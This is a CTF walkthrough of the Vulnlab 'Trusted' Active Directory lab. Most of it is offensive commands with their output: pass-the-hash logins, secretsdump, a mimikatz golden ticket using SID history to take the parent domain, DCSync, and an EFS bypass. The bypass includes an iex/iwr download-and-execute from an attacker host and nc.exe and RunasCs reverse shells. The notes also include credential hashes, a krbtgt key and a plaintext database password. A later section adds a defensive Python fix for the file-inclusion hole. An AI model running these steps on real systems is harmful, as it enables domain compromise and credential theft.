trusted.vl/Administrator:500:aad3b435b51404eeaad3b435b51404ee:15db914be1e6a896e7692f608a9d72ef:::
trusted.vl/Administrator:aes256-cts-hmac-sha1-96s:d75ec7df1acac724a6dfc250e707aab3492b6d9936b9898f742781b0a871d4a6
Obtained the hash of the parent-domain Administrator account.
evil-winrm
evil-winrm -i trusted.vl -u Administrator -H 15db914be1e6a896e7692f608a9d72ef
netexec smb 10.10.234.117 -u Administrator -H 15db914be1e6a896e7692f608a9d72ef --exec-method smbexec -x 'type C:\users\administrator\desktop\root.txt'
10.10.168.229
evil-winrm -i 10.10.168.229 -u Administrator -H 15db914be1e6a896e7692f608a9d72ef
netexec smb 10.10.168.229 -u Administrator -H 15db914be1e6a896e7692f608a9d72ef -x 'type C:\users\administrator\desktop\root.txt'
But the root flag cannot be read.
secretsdump
impacket-secretsdump administrator@10.10.168.229 -hashes :15db914be1e6a896e7692f608a9d72ef -just-dc-user administrator -just-dc-ntlm
windows
Manual exploitation steps on Windows:
(Get-ADDomain lab.trusted.vl).domainsid.value
S-1-5-21-2241985869-2159962460-1278545866
(Get-ADDomain trusted.vl).domainsid.value
S-1-5-21-3576695518-347000760-3731839591
.\mimikatz.exe "kerberos::golden /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /rc4:c7a03c565c68c6fac5f8913fab576ebd /user:administrator /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt" exit
kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt
.\mimikatz.exe "kerberos::ptt \programdata\trust.kirbi" exit
dir \\TRUSTEDDC.trusted.vl\c$
dir \\TRUSTEDDC\c$
invoke-command TRUSTEDDC -scriptblock {whoami}
.\mimikatz.exe "lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all" exit
Root.txt
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
Access to the path 'C:\Users\Administrator\desktop\root.txt' is denied.
At line:1 char:1
+ type root.txt
+ ~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator\desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
Reading root.txt directly returns Access is denied.
Check the path C:\users\<username>\appdata\roaming\Microsoft\Protect; files present there mean EFS encryption is in use.
dir $env:appdata\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 9/14/2022 9:03 AM S-1-5-21-3576695518-347000760-3731839591-500
CIPHER /u /n
Encrypted File(s) on your system:
C:\Documents and Settings\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop\root.txt
[System.IO.File]::GetAttributes("C:\Users\Administrator\Desktop\root.txt").ToString().Contains("Encrypted")
True
*Evil-WinRM* PS C:\Users\Administrator\desktop> cipher /c root.txt
Listing C:\Users\Administrator\desktop\
New files added to this directory will be encrypted.
E root.txt
Compatibility Level:
Windows Vista/Server 2008
cipher.exe : Access is denied.
+ CategoryInfo : NotSpecified: (Access is denied.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Access is denied. Key information cannot be retrieved.
Access is denied.
EFS Bypass
EFS (Encrypting File System) is a built-in Windows encryption feature that lets you encrypt files or directories so that other users cannot open them. It generates a certificate, which must be present in the current session in order to decrypt and read the encrypted files.
The key needs to be in memory.
The walkthrough's way to decrypt is to change the administrator password and then log in with RunasCs to read the file.
net users administrator "Password!1234"
evil-winrm -i 10.10.168.229 -u administrator -p 'Password!1234'
iex(iwr -useb http://10.8.3.83/Invoke-RunasCs.ps1)
curl.exe -O http://10.8.3.83/RunasCs.exe
Invoke-RunasCs -username administrator -password 'Password!1234' -command cmd.exe -remote 10.8.3.83:1234
.\RunasCs.exe administrator 'Password!1234' cmd -r 10.8.3.83:1234
Read the flag:
type C:\Users\Administrator\desktop\root.txt
It can also be decrypted:
C:\Users\Administrator\Desktop>cipher.exe /d root.txt
cipher.exe /d root.txt
Decrypting files in C:\Users\Administrator\Desktop\
root.txt [OK]
1 file(s) [or directorie(s)] within 1 directorie(s) were decrypted.
File
- C:\xampp\htdocs\dev\db.php
<?php
$servername = "localhost";
$username = "root";
$password = "SuperSecureMySQLPassw0rd1337.";
$conn = mysqli_connect($servername, $username, $password);
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>
- index.html
<?php
if(!isset($_GET['view']) || ($_GET['view']=="index.html")) {
    $content = <<<EOD
...
    echo $content;
}
else {
    echo "<p>";
    include($_GET['view']);
    echo "</p>";
}
?>
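The `include($_GET['view'])` branch above is the whole vulnerability: any string the client sends is handed straight to the include mechanism, which is why win.ini, php://filter, a UNC share and access.log all worked. As an added example, written in Python rather than the page's PHP so the checks are easy to read, the resolver below shows the three checks a hardened version needs: a strict name shape, an allowlist of shipped pages, and a path-containment check. The views directory and the allowlist are assumptions, not values from the original site; the rejected vectors are the ones used on this page.

```python
"""A hardened replacement for index.html's include($_GET['view']), in Python rather
than the page's PHP. Added example; the views directory and the allowlist are
assumptions, not values from the original site."""
import os
import re
from urllib.parse import unquote

VIEWS_DIR = os.path.abspath('views')                       # assumed directory holding the page fragments
ALLOWED_VIEWS = frozenset({'index.html', 'about.html'})    # assumed set of shipped pages
SAFE_NAME = re.compile(r'^[A-Za-z0-9_-]+\.html$')          # one bare file name: no separators, drives or schemes


def resolve_view(view, views_dir=VIEWS_DIR, allowed=ALLOWED_VIEWS):
    """Return the absolute path of the fragment to render, or None when the request must be refused."""
    if not view:
        view = 'index.html'                                # the original's default branch
    name = unquote(view)
    # 1. Shape check: rejects php://, \\host\share, C:\..., ../ and sess_* in one go.
    if not SAFE_NAME.fullmatch(name):
        return None
    # 2. Allowlist check: an unknown page is refused even if its name looks harmless.
    if name not in allowed:
        return None
    # 3. Containment check (defence in depth): the resolved path must stay under views_dir.
    candidate = os.path.abspath(os.path.join(views_dir, name))
    if os.path.commonpath([views_dir, candidate]) != views_dir:
        return None
    return candidate


# The inclusion vectors used in this writeup; every one must resolve to None.
REJECTED_VECTORS = [
    '/windows/win.ini',
    r'\\10.8.3.83\share\shell.php',
    'php://filter/read=convert.base64-encode/resource=db.php',
    r'C:\xampp\tmp\sess_q5u3hs587fjl52i7ngte64t4p7',
    '.htaccess',
    'c:/xampp/apache/logs/access.log',
    '../db.php',
    'about.html%00',
]

if __name__ == '__main__':
    print(resolve_view('about.html'))
    for vector in REJECTED_VECTORS:
        print(f'{vector!r:70} -> {resolve_view(vector)}')
```

The allowlist is the check that actually matters; the name-shape and containment checks are there so that a later edit to the allowlist (or a forgotten `unquote`) does not silently reopen the hole. In PHP the same idea is a fixed array of page names looked up with `in_array(..., true)` before any `include`.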
- C:\users\cpowers\Documents\task.ps1
type C:\users\cpowers\Documents\task.ps1
Get-Process "KasperskyRemovalTool" | Stop-Process -Force
Start-Process -FilePath "C:\AVTest\KasperskyRemovalTool.exe"
Issues
Files under the session directory are all empty:
dir C:\xampp\tmp\sess_paggh2grbcm917ie02jassmcnm
The UNC reverse shell failed; testing after obtaining a shell showed that local policy prevents access to files under UNC paths.
cmd /c "\\10.8.3.83\share\nc.exe -e cmd 10.8.3.83 1234"
PS C:\xampp\htdocs\dev> cmd : You can’t access this shared folder because your organization’s security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.
WP
Vulnlab — Trusted. Trused, an easy active directory chain… | by ARZ101 | Medium